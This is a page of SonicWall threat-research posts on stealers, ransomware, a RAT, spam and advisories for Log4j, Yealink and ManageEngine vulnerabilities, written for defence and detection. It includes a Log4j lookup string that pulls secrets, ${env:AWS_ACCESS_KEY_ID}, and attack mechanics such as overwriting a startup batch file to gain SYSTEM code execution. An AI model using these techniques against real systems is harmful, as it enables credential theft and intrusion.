Posts

Open source stealer malware, Mercurial, for "educational purposes" spotted in the wild

/in /by

The SonicWall Capture Labs threat research team has come across data theft malware derived from the Mercurial password stealer family.  This malware is open source and readily available on github for “educational purposes only”.  Because it is open source, it can be easily customized and deployed with little programming expertise necessary.  The malware is written in C# and is trivial to decompile.

 

Infection Cycle:

 

Upon infection, the malware copies itself to %APPDATA\Local\Temp\.  It also adds itself to the registry so that it is started after each reboot:

 

It scans the system for browser profile information:

 

In addition to searching for browser data, it also searches for Minecraft launch profile files and Discord Level DB files:

 

It contains a very basic level of antidebugging:

 

Any information that is gathered from the system is sent via an HTTP POST request to the operator:

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Blitzed.N (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Apache Log4j StrSubstitutor Vulnerability

/in /by

Overview:

  Apache Log4j is a logging library for Java. Log4j is a simple and flexible logging framework. With Log4j it is possible to enable logging at runtime without modifying the application binary. Apache Log4j is part of a project which is known as Apache Logging. The Log4j package is designed so that the logging statements can remain in shipped code without incurring a heavy performance cost. Logging behaviour can be controlled by editing a configuration file, without touching the application binary.

  An uncontrolled recursion vulnerability has been reported in the StrSubstitutor class of Apache Log4j. This vulnerability is due to improper handling of logged messages when the logging configuration uses a non-default Pattern Layout with a Context Map Lookup, Map Lookup, or Structured Data Lookup.

  A remote attacker who can control an item in the Thread Context Map or a MapMessage or StructuredDataMessage can exploit this vulnerability by sending a specially crafted parameter to the target application. Successful exploitation could result in a denial-of-service condition due to a crash of the Log4j service.

  Vendor: Logging Apache

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-45105

  See: CVE-ID

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:U/RL:O/RC:C).

  Base score is 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is none.
    • Impact of this vulnerability on data integrity is none.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 6.5 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  NVD CVSS Metrics

Technical Overview:

  An uncontrolled recursion vulnerability has been reported in the StrSubstitutor class of Apache Log4j. This vulnerability is due to improper handling of logged messages when the logging configuration uses a non-default Pattern Layout with a Context Map Lookup, Map Lookup, or Structured Data Lookup. When a variable is included in a lookup string, it is resolved by calling the substitute() method of the class org.apache.logging.log4j.core.lookup.StrSubstitutor.

  Once the marker for the end of a variable is found, the substitute() method is called recursively with the variable to be substituted. The method checkCyclicSubstitution() is called with each variable substitution, to detect infinite substitution loops. This method maintains a list of previously encountered variables in a variable named priorVariables. After the variable is resolved using the resolveVariable() method, the substitute() function is called recursively with the resolved content, to resolve any variables included in the result. However, when a variable is detected in the resolved content, substitute() is called recursively without supplying the priorVariables variable. Therefore, if a variable resolves to a nested lookup containing the same variable, it won’t be detected by the checkCyclicSubstitution() method, resulting in uncontrolled recursion.

  A remote attacker who can control an item in the Thread Context Map or a MapMessage or StructuredDataMessage can exploit this vulnerability by setting the item to an appropriate lookup containing a nested reference to itself. For example, if the attacker can control the value of the apiversion Thread Context Map item, they could set its value to the following string:

  

  Successful exploitation could result in a StackOverflowError due to uncontrolled recursion, leading to a denial of service condition due to a crash of the Log4j service.

Triggering the Problem:

  • The target must be running a vulnerable version of the software.
  • Target needs a non-default Pattern Layout with a Context Map Lookup, Map Lookup, or Structured Data Lookup.
  • Target must accept untrusted input within the Thread Context Map, MapMessage, or StructuredDataMessage.
  • The attacker must have network connectivity to the vulnerable server.

Triggering Conditions:

  The attacker sends a maliciously crafted parameter to the vulnerable server. The server adds the parameter to a Thread Context Map, MapMessage, or StructuredDataMessage and logs a message. The vulnerability is triggered when the server parses the lookup included in the parameter.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS:15738 Apache Log4j Self-Referential Lookup DoS (CVE-2021-45105) 1

  • IPS:15739 Apache Log4j Self-Referential Lookup DoS (CVE-2021-45105) 2

  • IPS:15740 Apache Log4j Self-Referential Lookup DoS (CVE-2021-45105) 3

  • IPS:18663 Apache Log4j Self-Referential Lookup DoS (CVE-2021-45105) 4

  Please note that if your web service/server is accessible over HTTPS, then enabling of Server DPI-SSL is necessary for the above signature to detect exploits targeting this vulnerability.

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor supplied patch.
    • Remove Context Map Lookups, Map Lookups, and Structured Data Lookups from the Apps Pattern Layout.
    • Detecting and blocking malicious traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

Github hosted Android ransomware being misused in the wild

/in /by

Github is a platform which is commonly used to host open-source projects, many such projects are security focused. SonicWall Threats Research team recently identified an Android ransomware that was found to be hosted on Github as an educational project.

 

Initial Discovery

We identified an Android apk (MD5: 6dc068db642247295e96437d8aca60a0) as malicious and upon inspecting its code found some interesting breadcrumbs which led us to the Github repository which was the origin for this treat. A simple search for the package name for this threat – com.termuxhackers.id – led us to the following Github repository:

 

One of the repositories hosted here is SARA – Simple Android Ransomware Attack:

 

We identified a number of malicious apps on a number of platforms that were spawned using this codebase. A number of these apps are masquerading as popular legitimate applications, few are listed below:

We identified more than 200 apps that have been created using this codebase.

 

Creating the ransomware

While building the apk, this kit asks the user to enter an unlock code:

 

Once executed, a screen with user entered text is overlayed on the screen and the victim cannot use the phone. Strings present in the strings.xml in the app resource folders are used on the ransom screen.

 

 

The unlock key is hardcoded in plaintext within the apk. The unlock key is added by the user during the app creation:

 

We analyzed a bunch of malicious apks, one instance in particular stood out where the ransom demand was 50BTC:

 

Overall this repository was created and distributed on Github for what appears to be educational purposes. However we identified a high number of apps created using this repository with legitimate app icons and application names. Whether this was created as a prank, with malicious intentions or to legitimately learn how ransomware works is yet to be determined.

 

Sonicwall Capture Labs provides protection against this threat using the signature listed below:

  • AndroidOS.Termux.RSM

 

Indicators of Compromise:

  • 00dc92f14326c7b0e87e877bfd12a7df
  • 6b9157e059da44f13843e682ac3bcba7
  • 6dc068db642247295e96437d8aca60a0

Spam Campaign Roundup: Christmas Holiday 2021 Edition

/in /by

With Christmas weekend upon us and many are still looking for the best last-minute deals, we noticed we are receiving an increasing amount of holiday related spam emails. We have been monitoring the amount of spam emails received this month and we noticed a trend where the amount received increases during the weekends.  Not surprising since consumers are spending more time shopping online so cybercriminals have become more aggressive and creative with their tactics.

The following are some of the common email subjects:

  • Don’t Wait! 80% off Christmas Sale
  • Christmas Sale Find the Perfect Gifts Now
  • Congratulations! You can get <insert merchant> $50 gift card!
  • Save up to 80% off on the perfect gift for everyone
  • Get a Drone as a gift
  • Ahoy! Christmas Special!
  • Hottest Christmas Gifts of 2021

Most of these emails are purporting to come from popular department stores promising gift cards, that when clicked would take you to a URL different from the real merchant’s website. The consumer will then be asked to enter their personal information and to participate in a number of “offers” often costing money in fees or subscriptions without the guarantee of ever receiving the products and services or the free gift card at the end of the process.

Some new tactic observed this year was the use of shortened URL masking the real website address where the link would take you. Adding a layer of trickery, to fool users into following links they otherwise wouldn’t click.

Another new trick this year, was adding a captcha to determine whether the user is actually human or bot.

They now also add a countdown timer to increase urgency and drive victims to act.

Rewards are too good to be true.

In this example, the user is asked to pay for a small amount to ship the reward in exchange for their credit card information.

We urge our users to always be vigilant and cautious with any unsolicited email and to avoid providing any personal information, particularly if you are not certain of the source.

SonicWALL Capture Labs Gateway Antivirus and Email Security service constantly monitor and provide protection against such malicious spam and phishing threats.

 

Yealink Device Management Command Injection Vulnerability

/in /by

SonicWall Capture Labs threat research team observed attacks exploiting vulnerability in Yealink devices.

Yealink’s powerful GUI-driven Yealink Device Management Platform delivers a comprehensive set of tools for implementing up to 5,000 Microsoft-certified Yealink Skype for Business IP phones. The platform solves the complexities of provisioning, management, call quality control and troubleshooting. The solution allows system-wide oversight and the ability to drill down into specific needs for various regions, user groups or even a particular device model.

Yealink Device Management Command Injection Vulnerability | CVE-2021-27561
A command injection vulnerability exists in Yealink Device Management. It  allows command injection as root via the  URI, without authentication.

Yealink DM server does not filter the user provided data which allows remote unauthenticated attackers to execute arbitrary commands.

In the above exploit, the attacker is able to bypass authentication and download and execute malicious script from the attacker controlled server .

Following versions are vulnerable:

  • Yealink Device Management (DM) 3.6.0.20

SonicWall Capture Labs provides protection against this threat via following signatures:

      • IPS 15456:Yealink DM Remote Code Execution

IoCs

  • 03f37a12673fd7ad01b744f84b61aad062a5b6eafbeb7aeac4a00ef28159ad80
  • 203.159.80.241

Threat Graph

GarrantDecrypt ransomware operator charges $5000 for decryption. Price negotiable.

/in /by

The SonicWall Capture Labs threat research team has been tracking ransomware, known to some in the antivirus community as GarrantDecrypt.  The current variant of this ransomware appeared in late November 2021.  The malware is aimed at infecting casual PC users rather than large corporations.  The ransom charge for file decryption is relatively cheap at $5000 in BTC.  This is significantly lower than what we have seen with most ransomware and the price can be negotiated down further with the operator.

 

Infection Cycle:

 

Upon infection, files on the system are encrypted.  Each encrypted file is given a “.decrypt” extension.  #file.decrypt#.txt is dropped into every directory containing encrypted files:

 

#file.decrypt#.txt contains the following message:

 

The malware disables various security policies on the system.  This can be seen in the decompiled code:

 

Only the encryption routine is present in the malware.  Decryption requires a seperate program provided by the operator:

 

We reached out to file.decrypt@yahoo.com and had the following conversation with the operator who appears to be German:

 

 

After a brief negotiation, we were able to have the price reduced:

 

 

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: GarrantDecrypt.N (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

AveMaria RAT is being delivered using ISO files

/in /by

Threat actors are using low profile file type to propagate malware as they are overlooked by many security software. One of them is optical disk image (ISO image), which is treated as a trusted file type. ISO files are being abused by threat actors to deliver the payload to the victim’s machine, without being detected. SonicWall RTDMI ™ engine has recently detected a bunch of ISO files which execute AveMaria RAT on victim’s machine, are being delivered as an email attachment.

The malware also uses file extension (.scr) and long file name including many special characters, which can also work as an evasion technique for a few security software:

 

The ISO contains a .NET executable which performs 1.5 seconds sleep operation 9 times then downloads binary data from an URL. The download data is being reversed to create a valid AveMaria Dynamic Link Library (DLL) file:

 

AveMaria DLL now being executed by calling one of its exported function:

AveMaria RAT

AveMaria malware behaves as InfoStealer, KeyLogger and Remote Access Trojan (RAT).  By analyzing the code, it seems the malware is also working on modifying Remote Desktop Services (termsrv.dll) to allow concurrent access by multiple users. The malware steals data from various installed apps from the victim’s machine including Microsoft Outlook and Mozilla Thunderbird.

The malware copies RegAsm.exe into %temp% directory and execute it to inject malicious code into the process:

 

List of web browsers targeted by the malware to steal stored credentials:

  • Microsoft Edge
  • UC Browser
  • QQ Browser
  • Opera
  • Blisk
  • Chromium
  • Brave
  • Vivaldi
  • Comodo Dragon
  • Torch
  • SlimJet
  • CentBrowser

 

Only a few security providers are detecting the ISO file at the time of analysis in popular threat intelligence sharing portals like the VirusTotal and the ReversingLabs indicates its uniqueness and evasiveness:

 

Evidence of the detection by RTDMI ™ engine can be seen below in the Capture ATP report for this file:

Microsoft Security Bulletin Coverage for December 2021

/in /by

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of December 2021. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2021-41333 Windows Print Spooler Elevation of Privilege Vulnerability
ASPY 272:Malformed-File exe.MP_221

CVE-2021-43207 Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 274:Malformed-File exe.MP_223

CVE-2021-43226 Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 276:Malformed-File exe.MP_225

CVE-2021-43233 Remote Desktop Client Remote Code Execution Vulnerability
ASPY 273:Malformed-File exe.MP_222

CVE-2021-43883 Windows Installer Elevation of Privilege Vulnerability
ASPY 275:Malformed-File exe.MP_224

The following vulnerabilities do not have exploits in the wild :
CVE-2021-40441 Windows Media Center Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-40452 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-40453 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-41360 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-41365 Microsoft Defender for IoT Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-42293 Microsoft Jet Red Database Engine and Access Connectivity Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-42294 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-42295 Visual Basic for Applications Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-42309 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-42310 Microsoft Defender for IoT Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-42311 Microsoft Defender for IoT Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-42312 Microsoft Defender for IOT Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-42313 Microsoft Defender for IoT Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-42314 Microsoft Defender for IoT Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-42315 Microsoft Defender for IoT Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-42320 Microsoft SharePoint Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-43214 Web Media Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-43215 iSNS Server Memory Corruption Vulnerability Can Lead to Remote Code Execution
There are no known exploits in the wild.
CVE-2021-43216 Microsoft Local Security Authority Server (lsasrv) Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-43217 Windows Encrypting File System (EFS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-43219 DirectX Graphics Kernel File Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-43222 Microsoft Message Queuing Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-43223 Windows Remote Access Connection Manager Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-43224 Windows Common Log File System Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-43225 Bot Framework SDK Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-43227 Storage Spaces Controller Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-43228 SymCrypt Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-43229 Windows NTFS Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-43230 Windows NTFS Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-43231 Windows NTFS Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-43232 Windows Event Tracing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-43234 Windows Fax Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-43235 Storage Spaces Controller Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-43236 Microsoft Message Queuing Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-43237 Windows Setup Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-43238 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-43239 Windows Recovery Environment Agent Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-43240 NTFS Set Short Name Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-43242 Microsoft SharePoint Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-43243 VP9 Video Extensions Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-43244 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-43245 Windows Digital TV Tuner Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-43246 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-43247 Windows TCP/IP Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-43248 Windows Digital Media Receiver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-43255 Microsoft Office Trust Center Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-43256 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-43875 Microsoft Office Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-43877 ASP.NET Core and Visual Studio Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-43880 Windows Mobile Device Management Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-43882 Microsoft Defender for IoT Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-43888 Microsoft Defender for IoT Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-43889 Microsoft Defender for IoT Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-43891 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-43893 Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-43896 Microsoft PowerShell Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-43899 Microsoft 4K Wireless Display Adapter Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-43905 Microsoft Office app Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-43907 Visual Studio Code WSL Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.

Apache Log4j Remote Code Execution Vulnerability

/in /by

Overview:

Apache Log4j is a Java-based logging utility that can be configured through a configuration file or through Java code. Apache Log4j provides many features, such as reliability, extensibility, multiple configuration support including xml/json/yaml, excellent performance and more.

A JNDI Injection vulnerability has been reported in the JndiManager class of Apache Log4j. This vulnerability is due to improper handling of logged messages.

A remote, unauthenticated attacker who can control log message contents can exploit this vulnerability by sending a specially crafted parameter to the target application. Successful exploitation results in the information disclosure, or remote code execution.

CVE Reference:

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-44228.

Common Vulnerability Scoring System (CVSS):

The overall CVSS score is 9.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:F/RL:O/RC:C).

Base score is 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is changed.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Temporal score is 9.3 (E:F/RL:O/RC:C), based on the following metrics:

  • The exploit code maturity level of this vulnerability is functional.
  • The remediation level of this vulnerability is official fix.
  • The report confidence level of this vulnerability is confirmed.

Technical Overview:

The Java Naming and Directory Interface (JNDI) is a Java API for a directory service that allows Java software clients to discover and look up data and resources (in the form of Java objects) via a name. JNDI support many services including Lightweight Directory Access Protocol (LDAP), Domain Name Service (DNS) and so on. Apache Log4j supports many performing lookups, including JNDI lookups.

The JNDI lookups feature on vulnerable version of Apache Log4j2.x allows it to add values at arbitrary places to Log4j configuration. Log4j is having a special syntax in the form ${lookup_name:key} (where lookup_name=one of the different lookups, key=attribute to be evaluated). When an attacker includes a string ${ in the request, the Log4j will attempt to write the same into the log data, while doing the same lookup method will be called which will find the strings after ${ and attempt to replace the strings with the actual values. For instance ${env:COMPUTERNAME} will become actual computer name(ex. TEST-PC) and ${env:AWS_ACCESS_KEY_ID} will become actual AWS SECRET KEY.

The JNDI lookups are enabled by default in the vulnerable versions of Log4j2.x and it does not sanitize the inputs, hence allowing attackers to send maliciously crafted requests to the web server or application which is using Log4j. The application will then respond with the evaluated strings.

Majority of attacks is using LDAP protocol as specified in the POCs available publicly, attackers are trying to leverage some other protocols as well, such as RMI, LDAPS, HTTP(S), DNS, IIOP, COBRA, NIS and NDS. Payloads are found in different section of HTTP request such as URI, parameters, headers such as User-Agent and Referrer and request body, as attackers trying to log the payload anyways so that it would be parsed by vulnerable Log4j.

This vulnerability becomes the worst exploited in the wild vulnerability in recent times, we are getting wide range of mutations in the payloads as attackers are trying to evade the protection or detection in place, for example, base64 encoded data. SonicWall has released multiple signatures to protect their customers.

Triggering the Problem:

  • The target must be running a vulnerable version of the software.
  • The attacker must have network connectivity to the vulnerable server.

Triggering Conditions:

The attacker sends a maliciously crafted parameter to the vulnerable server. The server logs the parameter using Log4j. The vulnerability is triggered when the server parses the JNDI lookup included in the log message.

SonicWall Capture Labs Threat Research is aware of vulnerability in Log4j Java-based logging library and has released the following IPS signature to detect the exploitation of threats related to CVE-2021-44228:

  • IPS: 2307  Apache Log4j2 JNDI Log Messages Remote Code Execution
  • IPS: 2067 Apache Log4j2 JNDI Log Messages Remote Code Execution LDAPS
  • IPS: 15732 Apache Log4j2 JNDI Log Messages Remote Code Execution NIS
  • IPS: 15733 Log4j2 JNDI Log Messages Remote Code Execution NDS
  • IPS: 15734 Apache Log4j2 JNDI Log Messages Remote Code Execution COBRA
  • IPS: 15735 Apache Log4j2 JNDI Log Messages Remote Code Execution RMI
  • IPS: 15736 Apache Log4j2 JNDI Log Messages Remote Code Execution IIOP
  • IPS: 15737 Apache Log4j2 JNDI Log Messages Remote Code Execution DNS 2
  • IPS: 2311 Apache Log4j2 JNDI Log Messages Remote Code Execution HTTP
  • IPS: 2315 Apache Log4j2 JNDI Log Messages Remote Code Execution DNS
  • IPS: 2328 Apache Log4j2 JNDI Log Messages Remote Code Execution HTTPS

Please note that if your web service/server is accessible over HTTPS, then enabling of Server DPI-SSL is necessary for the above signature to detect exploits targeting this vulnerability.

SonicWall’s, (WAF) Web Application Firewall, provides protection against this threat:

  • WAF: 1116 Apache Log4j2 JNDI Log Messages Remote Code Execution

Remediation Details:

The risks posed by this vulnerability can be mitigated or eliminated by:

  • Enable above mentioned IPS signatures on SonicWall firewalls
  • Enable Web Application Firewall signature above.
  • Updating to a non-vulnerable version of the product or applying the vendor supplied patch.
  • Removing the JndiLookup class from the classpath.

The vendor has released the following advisory regarding this vulnerability:
Vendor Advisory

Zoho ManageEngine Arbitrary File Upload Vulnerability

/in /by

Overview:

  ManageEngine ServiceDesk is an IT help desk platform that provides functionality to manage various aspects of an IT environment such as changes, incidents and assets and also incorporates a standard ITIL framework. ManageEngine SupportCenter Plus is a web-based customer support software that lets organizations effectively manage customer tickets, their account & contact information and the service contracts. The code/features between these two applications is extensively shared.

  An arbitrary file upload vulnerability has been reported in Zoho ManageEngine ServiceDesk Plus, ServiceDesk Plus MSP, and SupportCenter Plus. The vulnerability is due to an unspecified flaw related to the /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration.

  A remote attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could allow the attacker to execute arbitrary code with privileges of SYSTEM.

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-44077.

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.7 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.7 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

Technical Overview:

  ManageEngine ServiceDesk/SupportCenter include the features for configuring technicians information. The IT help desk team comprises the help desk team manager, help desk agent, and technicians who will be handling the requests posted / raised by various requesters from different accounts. A user can add, edit, or remove the technicians in the application and also provide them with various access privileges that suit their role and need. A user can also view the list of technicians in a particular account and/or site by selecting the account from the Accounts combo box and site from Technicians for combo box. The feature relevant to understanding this vulnerability is importing technicians information from a comma-separated (CSV) file into the application. Note that this feature is a legacy feature that is no longer available in both the unpatched (at least in the versions 11012 and 11012) and patched version of the SupportCenter Plus application.

  This feature is accessible via Apache Struts action ImportTechnicians defined in struts-config.xml. This feature is mapped to Request-URL “/RestAPI/ ImportTechnicians”. An unrestricted arbitrary file upload vulnerability exists in ManageEngine ServiceDesk Plus, ServiceDesk Plus MSP and SupportCenter Plus products. The vulnerability is due to improper validation of the filename parameter.

  The user sends a POST request to /RestAPI/ImportTechnicians and the value of the Content-Type header is string multipart/form-data, the execute method in the class com.adventnet.servicedesk.setup.action.ImportTechniciansAction is eventually called. The execute method uses the value of the filename attribute of the Content-Disposition header in the body of the request to write the contents of the file in the “\SupportCenterPlus\bin” or “\ServiceDesk\bin” directories (dependent on the specific product of ManageEngine).

  The uploaded file is not checked for the expected file extension which is “.csv”. Note that directory traversal is not possible as the Java classes org.apache.struts.upload.CommonsMultipartRequestHandler and org.apache.struts.upload.CommonsMultipartRequestHandler.CommonsFormFile from struts.core-1.3.11.jar are used by the application to remove from the filename parameter all characters before the last ‘/’ or ‘\’ character, before the vulnerable code in com.adventnet.servicedesk.setup.action.ImportTechniciansAction is reached.

  A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to ImportTechnicians action to write or overwrite arbitrary files in “\SupportCenterPlus\bin” or “\ServiceDesk\bin” directories (dependent on the specific product of ManageEngine). For instance, an attacker can overwrite file jreCorrector.bat in this directory. This batch file is executed during the startup of the product by wrapper.exe executable. It is also executed during the shutdown of the product. Also ManageEngine ServiceDesk/SupportCenter products are by default started automatically as a Windows service during the Windows startup (or after Windows restart). Therefore, successful exploitation could result in the arbitrary code execution with SYSTEM-level privileges.

Triggering the Problem:

  • The target must be running a vulnerable version of the software.
  • The attacker must have network connectivity to the target server.

Triggering Conditions:

  The attacker sends a request to the vulnerable servlet on the target server. The vulnerability is triggered when the server processes the request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP, over port 8080/TCP

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 2302 ManageEngine Products ImportTechnicians Arbitrary File Creation

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Restricting access to the affected communication port to trusted hosts only.
    • Upgrading to a non-vulnerable version of the product when available.
    • Detecting and blocking malicious traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory 1
  Vendor Advisory – ServiceDesk Plus MSP
  Vendor Advisory 2
  Vendor Advisory – ServiceDesk Plus
  Vendor Advisory 3